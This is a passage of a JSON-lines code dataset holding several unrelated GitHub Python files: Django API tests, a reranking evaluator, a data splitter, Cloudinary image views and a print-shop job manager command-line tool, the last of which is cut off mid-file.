+{"seq_id":"18309457214","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\nfrom django.test.utils import override_settings\nfrom ..models import Product\n\n\nclass TestProduct(APITestCase):\n\n def setUp(self) -> None:\n Product.objects.create(\n name='an orange',\n price='100',\n discount_price='80',\n discount='20',\n type='fruits')\n\n @override_settings(DEBUG=False)\n def test_list(self):\n Product.objects.create(\n name='a tomato',\n price='100',\n discount_price='80',\n discount='20',\n type='vegetables')\n response = self.client.get('/products/')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(len(response.data), 2)\n\n def test_retrieve(self):\n ...\n\n def test_delete(self):\n response = self.client.delete('/products/1/')\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n\n response = self.client.delete('/products/1/')\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)\n\n # Product.objects.create(\n # name='an orange',\n # price='100',\n # discount_price='80',\n # discount='20',\n # type='fruits')\n\n with self.assertRaises(ObjectDoesNotExist, msg='Не найдено'):\n Product.objects.get(pk=2)\n\n\nclass TestCoupon(APITestCase):\n def test_not_allowed(self):\n not_allowed_methods = {\n 'POST': self.client.post,\n 'PUT': self.client.put,\n 'PATCH': self.client.patch,\n 'DELETE': self.client.delete\n }\n response = self.client.get('/coupons/')\n url = '/coupons/'\n for method_name, method in not_allowed_methods.items():\n self.assertNotEqual(\n response.status_code, status.HTTP_405_METHOD_NOT_ALLOWED,\n msg=f'Method {method_name} should be not allowed for url: {url}')","repo_name":"iavicha/Shop","sub_path":"shop_api/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73598515751","text":"##\nclass SingleBitHalfAdder:\n def __init__(self, A,B):\n self.A = A & 1\n self.B = B & 1\n\n def result(self):\n carry = self.A & self.B\n sum = self.A ^ self.B\n return carry, sum\n\nclass SinlgeBitFullAdder:\n def __init__(self,A,B,C):\n self.A = A&1\n self.B = B&1\n self.C = C&1\n\n def result(self):\n c, s = SingleBitHalfAdder(self.A, self.B).result()\n c, s = c | (s ^ self.C) , s ^ self.C \n return c, s\n\nclass Adder:\n @classmethod\n def add(self,a,b):\n MAX = 0x7FFFFFFF\n MIN = 0x80000000\n mask = 0xFFFFFFFF\n while b: a, b = (a^b) & mask, ((a&b)<<1) & mask\n return a if a <= MAX else ~(a ^ mask)\n\n\n##\n","repo_name":"izayoi-ami/algorithm","sub_path":"python/bitwise.py","file_name":"bitwise.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"73741596070","text":"from sentence_transformers.evaluation import SentenceEvaluator\nfrom sentence_transformers.util import cos_sim, dot_score\nimport logging\nimport numpy as np\nimport os\nimport csv\n\nimport torch\nfrom sklearn.metrics import average_precision_score\nimport tqdm\n\nlogger = logging.getLogger(__name__)\n\ndef gen_uniformity(res):\n res = res.squeeze()\n nres = torch.nn.functional.normalize(res.detach().cpu(),dim=1)\n uniform_loss = torch.pdist(nres,p=2).pow(2).mul(-2).exp().mean().tolist()\n return uniform_loss\n\nclass RerankingEvaluator(SentenceEvaluator):\n \"\"\"\n This class evaluates a SentenceTransformer model for the task of re-ranking.\n\n Given a query and a list of documents, it computes the score [query, doc_i] for all possible\n documents and sorts them in decreasing order. Then, MRR@10 and MAP is compute to measure the quality of the ranking.\n\n :param samples: Must be a list and each element is of the form: {'query': '', 'positive': [], 'negative': []}. Query is the search query,\n positive is a list of positive (relevant) documents, negative is a list of negative (irrelevant) documents.\n \"\"\"\n def __init__(self, samples, mrr_at_k: int = 10, name: str = '', write_csv: bool = True, similarity_fct=cos_sim, batch_size: int = 64, show_progress_bar: bool = False, use_batched_encoding: bool = True):\n self.samples = samples\n self.name = name\n self.mrr_at_k = mrr_at_k\n self.similarity_fct = similarity_fct\n self.batch_size = batch_size\n self.show_progress_bar = show_progress_bar\n self.use_batched_encoding = use_batched_encoding\n\n if isinstance(self.samples, dict):\n self.samples = list(self.samples.values())\n\n ### Remove sample with empty positive / negative set\n self.samples = [sample for sample in self.samples if len(sample['positive']) > 0 and len(sample['negative']) > 0]\n\n\n self.csv_file = \"RerankingEvaluator\" + (\"_\" + name if name else '') + \"_results.csv\"\n self.csv_headers = [\"epoch\", \"steps\", \"MAP\", \"MRR@{}\".format(mrr_at_k),\"F1\", \"q_uniformity\", \"d_uniformity\", \"P@20\"]\n self.write_csv = write_csv\n\n def __call__(self, model, output_path: str = None, epoch: int = -1, steps: int = -1) -> float:\n if epoch != -1:\n if steps == -1:\n out_txt = \" after epoch {}:\".format(epoch)\n else:\n out_txt = \" in epoch {} after {} steps:\".format(epoch, steps)\n else:\n out_txt = \":\"\n\n logger.info(\"RerankingEvaluator: Evaluating the model on \" + self.name + \" dataset\" + out_txt)\n\n\n scores = self.compute_metrices(model)\n mean_ap = scores['map']\n mean_mrr = scores['mrr']\n f1 = scores['f1']\n mean_q_unif = scores['mean_q_unif']\n mean_d_unif = scores['mean_d_unif']\n mean_prec = scores['mean_prec']\n #### Some stats about the dataset\n num_positives = [len(sample['positive']) for sample in self.samples]\n num_negatives = [len(sample['negative']) for sample in self.samples]\n\n logger.info(\"Queries: {} \\t Positives: Min {:.1f}, Mean {:.1f}, Max {:.1f} \\t Negatives: Min {:.1f}, Mean {:.1f}, Max {:.1f}\".format(len(self.samples), np.min(num_positives), np.mean(num_positives),\n np.max(num_positives), np.min(num_negatives),\n np.mean(num_negatives), np.max(num_negatives)))\n logger.info(\"MAP: {:.2f}; P@20 {:.2f}\".format(mean_ap * 100, mean_prec * 100))\n logger.info(\"MRR@{}: {:.2f}\".format(self.mrr_at_k, mean_mrr * 100))\n logger.info(\"F1: {:.2f}\".format(f1 * 100))\n logger.info(\"Query uniformity: {:.2f}, doc uniformity: {:.2f}\".format(mean_q_unif * 100, mean_d_unif * 100))\n\n #### Write results 
to disc\n if output_path is not None and self.write_csv:\n csv_path = os.path.join(output_path, self.csv_file)\n output_file_exists = os.path.isfile(csv_path)\n with open(csv_path, newline='', mode=\"a\" if output_file_exists else 'w', encoding=\"utf-8\") as f:\n writer = csv.writer(f)\n if not output_file_exists:\n writer.writerow(self.csv_headers)\n\n writer.writerow([epoch, steps, mean_ap, mean_mrr, f1, mean_q_unif, mean_d_unif, mean_prec])\n\n return mean_mrr\n\n def compute_metrices(self, model):\n return self.compute_metrices_batched(model) if self.use_batched_encoding else self.compute_metrices_individual(model)\n\n def compute_metrices_batched(self, model):\n \"\"\"\n Computes the metrices in a batched way, by batching all queries and\n all documents together\n \"\"\"\n all_mrr_scores = []\n all_ap_scores = []\n pos_doc_uniformity = []\n query_uniformity = []\n all_p_score = []\n all_query_features = model.encode([sample['query'] for sample in self.samples],\n convert_to_tensor=True,\n batch_size=self.batch_size,\n show_progress_bar=True,\n output_value = None) #self.show_progress_bar)\n\n \n all_query_embs = torch.stack([feature['sentence_embedding'] for feature in all_query_features], dim = 0)\n all_docs = []\n\n for sample in self.samples:\n all_docs.extend(sample['positive'])\n all_docs.extend(sample['negative'])\n\n all_doc_features = model.encode(all_docs,\n convert_to_tensor=True,\n batch_size=self.batch_size,\n show_progress_bar=self.show_progress_bar, output_value = None)\n \n all_docs_embs = torch.stack([feature['sentence_embedding'] for feature in all_doc_features], dim = 0)\n TP, FP, TN, FN = 0, 0, 0, 0\n\n #Compute scores\n query_idx, docs_idx = 0,0\n pos_docs_embs = []\n for instance in tqdm.tqdm(self.samples):\n query_emb = all_query_embs[query_idx]\n query_idx += 1\n\n num_pos = len(instance['positive'])\n num_neg = len(instance['negative'])\n docs_emb = all_docs_embs[docs_idx:(docs_idx+num_pos+num_neg)]\n pos_docs_embs.append(all_docs_embs[docs_idx:(docs_idx+num_pos)])\n\n docs_idx += num_pos + num_neg\n\n if num_pos == 0 or num_neg == 0:\n continue\n\n pred_scores = self.similarity_fct(query_emb, docs_emb)\n if len(pred_scores.shape) > 1:\n pred_scores = pred_scores[0]\n\n pred_scores_argsort = torch.argsort(-pred_scores) #Sort in decreasing order\n\n #Compute MRR score\n is_relevant = [True]*num_pos + [False]*num_neg\n mrr_score = 0\n for rank, index in enumerate(pred_scores_argsort[0:self.mrr_at_k]):\n if is_relevant[index]:\n mrr_score = 1 / (rank+1)\n break\n all_mrr_scores.append(mrr_score)\n\n prec = 0\n for rank, index in enumerate(pred_scores_argsort[0:20]):\n if is_relevant[index]:\n prec += 1\n break\n\n all_p_score.append(prec/20)\n # Compute AP\n all_ap_scores.append(average_precision_score(is_relevant, pred_scores.cpu().tolist()))\n query_classes = [torch.argmax(feature['class_pred']).tolist() for feature in all_query_features] # class 1\n doc_classes = [torch.argmax(feature['class_pred']).tolist() for feature in all_doc_features]# class 0\n for pred in query_classes:\n if pred == 0:\n TP += 1\n else:\n FN += 1\n\n for pred in doc_classes:\n if pred == 0:\n FP += 1\n else:\n TN += 1\n\n mean_ap = np.mean(all_ap_scores)\n mean_mrr = np.mean(all_mrr_scores)\n\n mean_q_unif = gen_uniformity(all_query_embs)\n mean_d_unif = gen_uniformity(torch.cat(pos_docs_embs,0))\n mean_prec = np.mean(all_p_score)\n prec = TP / (TP + FP + 0.0000001)\n recall = TP / (TP + FN + 0.0000001)\n f1 = 2 * prec * recall / (prec + recall + 0.0000001)\n return {'map': mean_ap, 
'mrr': mean_mrr, 'f1': f1, 'mean_q_unif': mean_q_unif, 'mean_d_unif': mean_d_unif, 'mean_prec': mean_prec}\n\n\n def compute_metrices_individual(self, model):\n \"\"\"\n Embeds every (query, positive, negative) tuple individually.\n Is slower than the batched version, but saves memory as only the\n embeddings for one tuple are needed. Useful when you have\n a really large test set\n \"\"\"\n all_mrr_scores = []\n all_ap_scores = []\n TP, FP, TN, FN = 0, 0, 0, 0\n\n for instance in tqdm.tqdm(self.samples, disable=not self.show_progress_bar, desc=\"Samples\"):\n query = instance['query']\n positive = list(instance['positive'])\n negative = list(instance['negative'])\n\n if len(positive) == 0 or len(negative) == 0:\n continue\n\n docs = positive + negative\n is_relevant = [True]*len(positive) + [False]*len(negative)\n\n query_feature = model.encode([query], convert_to_tensor=True, batch_size=self.batch_size, show_progress_bar=False, output_value = None)\n docs_feature = model.encode(docs, convert_to_tensor=True, batch_size=self.batch_size, show_progress_bar=False, output_value = None)\n\n query_emb = query_feature['sentence_embedding']\n docs_emb = docs_feature['sentence_embedding']\n\n query_class = torch.argmax(query_feature['class_pred'], 1) # class 1\n doc_classes = torch.argmax(docs_feature['class_pred'], 1) # class 0\n\n for pred in query_class:\n if pred == 0:\n TP += 1\n else:\n FN += 1\n\n for pred in doc_classes:\n if pred == 0:\n FP += 1\n else:\n TN += 1\n\n pred_scores = self.similarity_fct(query_emb, docs_emb)\n if len(pred_scores.shape) > 1:\n pred_scores = pred_scores[0]\n\n pred_scores_argsort = torch.argsort(-pred_scores) #Sort in decreasing order\n\n #Compute MRR score\n mrr_score = 0\n for rank, index in enumerate(pred_scores_argsort[0:self.mrr_at_k]):\n if is_relevant[index]:\n mrr_score = 1 / (rank+1)\n break\n all_mrr_scores.append(mrr_score)\n\n # Compute AP\n all_ap_scores.append(average_precision_score(is_relevant, pred_scores.cpu().tolist()))\n\n mean_ap = np.mean(all_ap_scores)\n mean_mrr = np.mean(all_mrr_scores)\n prec = TP / (TP + FP)\n recall = TP / (TP + FN)\n f1 = 2 * prec * recall / (prec + recall + 0.0000001)\n return {'map': mean_ap, 'mrr': mean_mrr, \"f1\": f1}\n\n ","repo_name":"heshanxiu/beir_eval","sub_path":"src/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":11290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
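A tiny, self-contained illustration of the two ranking metrics the evaluator above computes: with a single positive document ranked second out of four candidates, both the reciprocal rank and the average precision come out to 1/2.

```python
from sklearn.metrics import average_precision_score

is_relevant = [False, True, False, False]   # candidates already in ranked order
scores = [0.9, 0.8, 0.3, 0.1]               # higher score = ranked earlier

# Reciprocal rank of the first relevant hit: position 2 -> 1/2.
mrr = next(1.0 / (rank + 1) for rank, rel in enumerate(is_relevant) if rel)
assert mrr == 0.5
assert average_precision_score(is_relevant, scores) == 0.5
```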
+{"seq_id":"75116518630","text":"N=int(input())\ni=2\ntemp=[]\ncount=None\nif N!=1:\n while i<=N:\n if N%i==0:\n temp.append(i)\n N//=i\n else:\n i+=1\nfor j in temp:\n print(j,end=\" \")\n","repo_name":"jes9401/algorithm_study","sub_path":"baekjoon/11653.py","file_name":"11653.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"35667015777","text":"from collections import OrderedDict\n\nfrom drf_yasg import openapi\nfrom drf_yasg.inspectors import SwaggerAutoSchema\nfrom rest_framework import serializers as drf_serializers\n\n\nclass CustomFieldsSerializer(drf_serializers.Serializer):\n \"\"\"\n 支持添加`自定义字段`的serializer\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n # Don't pass the 'add_fields' arg up to the superclass\n add_fields = kwargs.pop(\"add_fields\", None)\n\n # Instantiate the superclass normally\n super().__init__(*args, **kwargs)\n\n if add_fields is not None:\n # Add 'add_fields' to fields\n self.fields.update(add_fields)\n\n\nclass ResponseSerializer(CustomFieldsSerializer):\n code = drf_serializers.IntegerField()\n result = drf_serializers.BooleanField()\n message = drf_serializers.CharField()\n\n\nclass PaginatedDataSerializer(CustomFieldsSerializer):\n count = drf_serializers.IntegerField()\n has_next = drf_serializers.BooleanField()\n has_previous = drf_serializers.BooleanField()\n\n\ndef get_response_serializer(data_field=None):\n \"\"\"\n 用于 drf-yasg swagger_auto_schema 获取标准的 response serializer\n \"\"\"\n add_fields = {\"data\": data_field} if data_field else {}\n return ResponseSerializer(add_fields=add_fields)\n\n\ndef get_paginated_response_serializer(results_field=None):\n\n \"\"\"\n 用于 drf-yasg swagger_auto_schema 获取标准翻页的 response serializer\n \"\"\"\n add_fields = {\"results\": results_field} if results_field else {}\n paginated_data_slz = PaginatedDataSerializer(add_fields=add_fields)\n return ResponseSerializer(add_fields={\"data\": paginated_data_slz})\n\n\nclass ResponseSwaggerAutoSchema(SwaggerAutoSchema):\n def get_response_schemas(self, response_serializers):\n responses = super().get_response_schemas(response_serializers)\n new_responses = OrderedDict()\n for sc, response in responses.items():\n new_responses[sc] = openapi.Response(\n description=response.get(\"description\", \"\"),\n schema=openapi.Schema(\n type=openapi.TYPE_OBJECT,\n properties=OrderedDict(\n (\n (\"code\", openapi.Schema(type=openapi.TYPE_INTEGER)),\n (\"result\", openapi.Schema(type=openapi.TYPE_BOOLEAN)),\n (\"message\", openapi.Schema(type=openapi.TYPE_STRING)),\n (\"data\", response.get(\"schema\")),\n )\n ),\n ),\n )\n return new_responses\n\n\nclass PaginatedResponseSwaggerAutoSchema(SwaggerAutoSchema):\n def get_response_schemas(self, response_serializers):\n responses = super().get_response_schemas(response_serializers)\n new_responses = OrderedDict()\n for sc, response in responses.items():\n new_responses[sc] = openapi.Response(\n description=\"\",\n schema=openapi.Schema(\n type=openapi.TYPE_OBJECT,\n properties=OrderedDict(\n (\n (\"code\", openapi.Schema(type=openapi.TYPE_INTEGER)),\n (\"result\", openapi.Schema(type=openapi.TYPE_BOOLEAN)),\n (\"message\", openapi.Schema(type=openapi.TYPE_STRING)),\n (\n \"data\",\n openapi.Schema(\n type=openapi.TYPE_OBJECT,\n properties=OrderedDict(\n (\n (\"count\", openapi.Schema(type=openapi.TYPE_INTEGER)),\n (\"results\", response[\"schema\"]),\n )\n ),\n ),\n ),\n )\n ),\n ),\n )\n return new_responses\n","repo_name":"Xmandon/bk-iam-saas","sub_path":"saas/backend/common/swagger.py","file_name":"swagger.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"}
+{"seq_id":"25874708398","text":"\"\"\"Code to split data into sets.\"\"\"\nimport abc\nfrom typing import Optional, Sequence, Union, Dict, Any, Tuple\n\nimport numpy as np\n\nfrom brain_pipe.pipeline.base import PipelineStep\nfrom brain_pipe.split.operations.base import SplitterOperation\n\n\nclass Splitter(PipelineStep, abc.ABC):\n \"\"\"Base class for splitting data into sets.\"\"\"\n\n def __init__(\n self,\n feature_mapping: Union[Dict[str, Any], Sequence[str], str],\n split_fractions: Sequence[Union[int, float]],\n split_names: Sequence[str],\n extra_operation: Optional[SplitterOperation] = None,\n axis=0,\n ):\n \"\"\"Create a splitter.\n\n Parameters\n ----------\n feature_mapping: Union[Dict[str, Any], Sequence[str], str]\n A mapping from the data key to the key of the data to split.\n split_fractions: Sequence[Union[int, float]]\n Fractions of the data to split into the different sets.\n split_names: Sequence[str]\n Names of the different sets.\n extra_operation: Optional[SplitterOperation]\n Operation to perform on the split data. If None, no operation is\n performed.\n axis: int\n Axis to split the data on.\n \"\"\"\n self.feature_mapping = self.parse_dict_keys(feature_mapping)\n self.split_fractions = self._normalize_split_fraction(split_fractions)\n self.split_names = split_names\n self.extra_operation = extra_operation\n self.axis = axis\n\n def _normalize_split_fraction(self, split_fractions):\n return [fraction / sum(split_fractions) for fraction in split_fractions]\n\n @abc.abstractmethod\n def split(\n self, data: Any, shortest_length: int, split_fraction: float, start_index: int\n ) -> Tuple[Any, int]:\n \"\"\"Split the data into sets.\n\n Parameters\n ----------\n data: Any\n Data to split.\n shortest_length: int\n Length of the shortest data.\n split_fraction: float\n Fraction of the data to split into the current set.\n start_index: int\n Index to start splitting the data from.\n\n Returns\n -------\n Any, int\n The split data and the index to start splitting the next data from.\n \"\"\"\n pass\n\n def __call__(self, data_dict):\n \"\"\"Split data into sets.\n\n Parameters\n ----------\n data_dict: Dict[str, Any]\n The data dict containing the data to split.\n\n Returns\n -------\n Dict[str, Any]\n The data dict containing the split data.\n \"\"\"\n shortest_length = min(\n [data_dict[key].shape[self.axis] for key in self.feature_mapping.keys()]\n )\n for from_key, to_key in self.feature_mapping.items():\n data = np.take(\n data_dict[from_key], np.arange(0, shortest_length), axis=self.axis\n )\n resulting_data = {}\n\n self.extra_operation.reset()\n start_index = 0\n for split_name, split_fraction in zip(\n self.split_names, self.split_fractions\n ):\n split_data, start_index = self.split(\n data, shortest_length, split_fraction, start_index\n )\n if self.extra_operation is not None:\n split_data = self.extra_operation(split_data)\n resulting_data[split_name] = split_data\n del data_dict[from_key]\n data_dict[to_key] = resulting_data\n\n return data_dict\n","repo_name":"exporl/brain_pipe","sub_path":"brain_pipe/split/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"23244706248","text":"from random import randint\n\nfrom cloudinary import uploader\nfrom cloudinary.templatetags import cloudinary\nfrom rest_framework import status, permissions\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.response import Response\n\nfrom attachments.models import Image\nfrom chat.models import Message, Chat\nfrom custom_auth.models import User\n\n\nclass ImageMixin:\n\n @staticmethod\n def upload_image_cloudinary(file, image_name):\n uploader.upload(\n file,\n public_id=image_name,\n )\n\n @staticmethod\n def post_cloudinary(request, obj):\n print(request.FILES)\n for file in request.FILES.values():\n image_name = '{0}_v{1}'.format(file.name.split('.')[0],\n randint(1000, 9999))\n ImageMixin.upload_image_cloudinary(file=file, image_name=image_name)\n image_url = cloudinary.utils.cloudinary_url(image_name)[0]\n image = Image(name=image_name, imageURL=image_url, content_object=obj)\n image.save()\n\n @staticmethod\n def can_change_photo(user, image):\n obj = image.content_object\n if obj.__class__ is Message:\n return obj.user == user\n elif obj.__class__ is Chat:\n return obj.creator == user\n elif obj.__class__ is User:\n return obj == user\n return False\n\n\n@api_view(['DELETE'])\n@permission_classes([permissions.IsAuthenticated])\ndef message_destroy_image(request, pk=None):\n \"\"\"\n Deletes message by its id\n\n :param request:\n :param pk:\n :return:\n \"\"\"\n try:\n image = Image.objects.get(pk=pk)\n except Image.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n user = request.user\n if not ImageMixin.can_change_photo(user, image):\n return Response(status=status.HTTP_403_FORBIDDEN)\n image.delete()\n return Response(status=status.HTTP_200_OK)\n","repo_name":"TrueChat/Backend","sub_path":"truechat/attachments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"37621206806","text":"import time, datetime, os, pickle, sys, re, traceback\n\n# Own modules:\nfrom tools import tools, JobNotFoundError, ActionCancelledError\nfrom files import Files\nfrom pdf_generator import MakePDF\nfrom interface import interface, start\nFiles.check_files()\n\nprint(\"\"\" \n ______ __ ______ __ __ \n /\\ ___\\ /\\ \\ /\\ __ \\ /\\ \\ _ \\ \\ \n \\ \\ __\\ \\ \\ \\____ \\ \\ \\/\\ \\ \\ \\ \\/ \".\\ \\ \n \\ \\_\\ \\ \\ \\ \\ \\_____\\ \\ \\__/\".~\\_\\ \n#####################################################################\n---------------------------------------------------------------------\n \"\"\")\n\nclass JobList:\n \"\"\" Class for managing jobs, Instance of this class is created in the last lines \"\"\"\n\n # Tehdään lista jossa säilytetään Jobit ajon aikana.\n def __init__(self):\n self.current_job_list = []\n self.info = None # Tähän haetaan info-objekti tiedostosta. Sisältää muuta infoa joka halutaan säilyttää\n self.history = None\n\n # Funktio jolla haetaan työt tiedostosta.\n def get_job_list_from_file(self):\n if os.path.getsize(\"current_job_list.txt\") > 0:\n with open(\"current_job_list.txt\", \"rb\") as f:\n self.current_job_list = pickle.load(f, fix_imports=False, encoding=\"ASCII\", errors=\"strict\")\n #Lisää tähän objektiin muualla tarvittavaa infoa\n self.info = self.current_job_list[0]\n\n # Funktio tiedoston päivitykseen.\n def write_pickle_file(self):\n with open(\"current_job_list.txt\", \"wb\") as f:\n pickle.dump(self.current_job_list, f, protocol=4, fix_imports=False)\n\n def get_hist(self):\n with open(\"hist_log.txt\", \"rb\") as f:\n hist = pickle.load(f, fix_imports=False, encoding=\"ASCII\", errors=\"strict\")\n return hist\n\n def copy_from_hist(self):\n hist = self.get_hist()\n job_to_copy = input(\"\\nType the the id of the job you wan't to copy: \")\n temp_job = None\n if job_to_copy.isdigit():\n job_to_copy = int(job_to_copy)\n else:\n print(\"\\n {} is not valid input. ID can only contain integers.\".format(id_to_remove))\n return\n\n for job in hist[1:]:\n if job.job_id == job_to_copy:\n temp_job = job\n temp_job.addedDate = datetime.datetime.now().strftime(\"%d-%m %H:%M\")\n temp_job.status = tools.get_valid_input(\"\\nGive new value for STATUS\", (\"1\",\"2\"))\n temp_job.job_id = self.info.current_id\n self.info.current_id += 1\n self.current_job_list.append(temp_job)\n break\n\n def write_hist(self, new_hist):\n with open(\"hist_log.txt\", \"wb\") as f:\n pickle.dump(new_hist, f, protocol=4, fix_imports=False)\n\n # Funktio töiden lisäämiseen. \n def add_job(self):\n\n print(\"\\n ENTERING NEW JOB\\n\")\n self.current_job_list.append(Job(tools.add_or_edit_job(None, self.info.current_id)))\n print(\"\\n Job {} added!\".format(self.info.current_id))\n self.info.current_id += 1\n\n def delete_job(self):\n \"\"\" Poistaa id:n perusteella valitun työn. \"\"\"\n id_to_remove = input(\"\\nType the ID of the Job you wan't to delete: \")\n\n if id_to_remove.isdigit():\n id_to_remove = int(id_to_remove)\n else:\n print(\"\\n {} is not valid input. 
ID can only contain integers.\".format(id_to_remove))\n return\n\n n = None\n for i in self.current_job_list[1:]:\n if i.job_id == id_to_remove:\n\n n = tools.get_valid_input(\"Are you sure you wan't to remove {} : {} : {} : {} : {} ?\".format(\"ID: \", i.job_id, i.customer, i.product, i.amount), (\"y\", \"n\")).lower()\n\n if n == \"y\":\n self.current_job_list.remove(i)\n i.status = (\"DELETED {}\".format(datetime.datetime.now().strftime(\"%d-%m-%Y %H:%M\")))\n #Tallennetaan hist_logiin poistettu työ\n temp_hist_log = self.get_hist()\n temp_hist_log.append(i)\n self.write_hist(temp_hist_log)\n print(\"\\n Job succesfully deleted!\")\n return\n\n elif n == \"n\":\n print(\"\\n Deletion cancelled!\")\n return\n \n print(\"\\n ID: {} NOT FOUND\".format(id_to_remove))\n\n def edit_job(self, n):\n # Katsotaan jos käyttäjä käyttää 'e#p' shortcutia, ja passataan parametri (tällä hetkellä vain p toimii) add_or_edit_job functiolle\n input_id = None\n suggestion = None\n if n == \"e\":\n suggestion = input(\"\\nType the ID of the job you wan't to edit: \")\n if suggestion.isdigit():\n input_id = int(suggestion)\n #except:\n # if input_id == \"q\":\n # break\n # print(input_id, \" is not a valid input. ID can only contain integers! (q to cancel): \")\n\n if len(n) > 1 and n[1:].isdigit():\n input_id = int(n[1:])\n\n parameter = None\n if len(n) > 2 and n[-1] == \"p\" and n[1:-1].isdigit():\n input_id = int(n[1:-1])\n parameter = n[-1]\n print(\"\\n Shortcut 'e#p' detected.\")\n\n for i in RUNNING_LIST.current_job_list[1:]:\n if i.job_id == input_id:\n index_of_the_job = self.current_job_list.index(i)\n # Tässä korvataan vanha objekti uudella vastaavalla (johon on vaihdettu haluttu parametri)\n self.current_job_list[index_of_the_job] = Job(tools.add_or_edit_job(i, None, parameter))\n return\n\n print(\"\\n ID {} NOT FOUND\".format(input_id))\n \n def show_list(self, job_list):\n\n if job_list == []:\n print(\"\\n No jobs of this kind.\")\n return\n\n print(\"\"\"\n ID: ADDED: PR: CUSTOMER: PRODUCT: AMOUNT: SHEET: MATERIAL: COMMENT: STATUS:\"\"\")\n for i in job_list:\n print(\" ------------------------------------------------------------------------------------------------------------------------------------------------------\")\n print(\" | \", str(i.job_id).ljust(3), \" | \", i.addedDate, \" | \", str(i.priority).ljust(2), \" | \", \\\n i.customer.ljust(15)[:15], \" | \", i.product.ljust(15)[:15], \" | \", i.amount.ljust(10)[:10], \" | \", \\\n i.printing_sheet_size.ljust(5)[:5], \" | \", i.material.ljust(13)[:13], \" | \", i.comment.ljust(10)[:10], \" | \", str(i.status).ljust(16)[:16], \"| \")\n print(\" ------------------------------------------------------------------------------------------------------------------------------------------------------\\n\")\n\n def show_job_info(self, id_to_show):\n \"\"\".ljust(14)[:14]\"\"\"\n for i in self.current_job_list[1:]:\n if i.job_id == id_to_show:\n rivitetty_comment = tools.rivitetty(i.comment, len(i.status) + 13)\n print(\"\"\" \n {} \n ---------------------------{} \n _/_/_/ _/ _/ _/_/_/_/ _/_/ ID {} : {} : {} : {} \n _/ _/_/ _/ _/ _/ _/ _/ ---------------------------{} \n _/ _/ _/ _/ _/_/_/ _/ _/ Product : {} \n _/ _/ _/_/ _/ _/ _/ _/ Amount : {} \n _/_/_/ _/ _/ _/ _/_/ Material : {} \n Sheet size : {}\"\"\".format( \\\n i.customer, \"-\".ljust(len(i.status), \"-\"), \\\n i.job_id, i.priority, i.addedDate, i.status, \\\n \"-\".ljust(len(i.status), \"-\"), \\\n i.product, \\\n i.amount, \\\n i.material,\\\n i.printing_sheet_size, \\\n ))\n \n 
print(\"\"\" Comment : {}\"\"\".format(rivitetty_comment[0]))\n for row in rivitetty_comment[1:]:\n print(\" {}\".format(row))\n\n print( \" ---------------------------{}\".format(\"-\".ljust(len(i.status), \"-\")))\n\n def _clear_job_list(self):\n n = tools.get_valid_input(\"Are you sure you wan't to remove all jobs from current_job_list permanently. \\\nJobs removed by 'clear' are not saved to history. \", (\"y\", \"n\"))\n if n == \"y\":\n self.current_job_list[1:] = []\n if n == \"n\":\n print(\"\\n CLEAR CANCELLED\")\n\n def restore_from_history(self):\n n = input(\"\\nType the ID of the job you wan't to restore: \")\n job_found = False\n temp_hist_log = self.get_hist()\n for job in temp_hist_log[1:]:\n if job.job_id == int(n):\n job_found = True\n job.status = tools.get_valid_input(\"Input a new STATUS for restored job:\", (\"1\",\"2\"))\n temp_hist_log.remove(job)\n self.current_job_list.append(job)\n self.write_hist(temp_hist_log)\n print(\"\\n Job {} succesfully restored from history!\".format(n))\n return\n\n if not job_found:\n print(\"\\n Job id {} not found.\".format(n))\n \n def move(self, usr_input):\n \"\"\" In the interface, user can input a string starting with mu or md, depending of direction of movement.\n Next in the string must come the ID of the job, that wan'ts to be moved.\n An optional third argument is the 'n', which indicates, that the user want's to move the item by\n a number of times. (this number is asked if the 'n' is detected \"\"\"\n\n #Check if we can use that input. If we can, use it.\n if re.fullmatch(\"[m][u,d][\\d]+[n]?\", usr_input):\n\n # get direction from usr_input\n direction = usr_input[1]\n\n # get id from usr_input and if last character is n, then ask how many times user wants to move item\n id_to_move = None\n if usr_input[-1] == \"n\":\n while True:\n how_many_times = input(\"\\nMove {} by :\".format(\"UP\" if direction == \"u\" else \"DOWN\"))\n if how_many_times.isdigit():\n how_many_times = int(how_many_times)\n break\n else:\n print(\"\\n Not a number.\")\n\n id_to_move = int(usr_input[2:-1])\n else:\n id_to_move = int(usr_input[2:])\n how_many_times = 1\n\n cur_jobs = self.current_job_list\n try:\n job_to_move = tools.get_job_by_id(id_to_move, cur_jobs[1:])\n except JobNotFoundError:\n print(\"\\n Job {} not found\".format(id_to_move))\n return\n\n index_of_target_position = None\n\n # Check if user is trying to move job too far (in place of the info object or over OR over the end of the list.) 
